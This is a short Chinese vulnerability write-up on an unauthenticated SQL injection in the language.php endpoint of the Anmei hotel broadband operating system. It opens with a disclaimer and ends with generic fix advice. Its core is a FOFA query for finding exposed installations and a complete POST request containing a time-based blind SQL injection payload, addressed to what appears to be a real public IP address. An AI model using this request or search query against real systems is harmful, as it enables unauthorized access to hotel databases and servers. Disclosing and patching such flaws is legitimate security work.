免责声明:本号提供的网络安全信息仅供参考,不构成专业建议。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我联系,我将尽快处理并删除相关内容。
漏洞描述
安美数字酒店宽带运营系统的language.php接口存在SQL注入漏洞。攻击者可以通过构造恶意的SQL语句,未经身份认证地访问数据库,从而获取敏感信息或控制服务器
漏洞再现
FOFA: title="酒店宽带运营系统"
在https://ip/manager/login.php页面抓包,再修改请求包(延时5s)
POST /language.php HTTP/1.1
Host: 202.97.137.228:62443
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://fofa.info/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263EditStatus=1&LangEName=pHqghUme&LangID=1&LangName=pHqghUme&LangType=0000%E7%B3%BB%E7%BB%9F%E5%9F%BA%E6%9C%AC%E4%BF%A1%E6%81%AF&Lately=555-666-0606&Search=the&SerialID=1&Type=0'XOR(if(now()=sysdate()%2Csleep(5)%2C0))XOR'Z&UID=add&submit=%20%E6%B7%BB%20%E5%8A%A0%20
修复建议
1.参数化查询:使用参数化查询或预编译语句来避免SQL注入。
2.输入验证:对用户输入进行严格的验证和过滤,防止恶意数据注入。
3.最小权限原则:限制数据库用户的权限,仅授予必要的操作权限。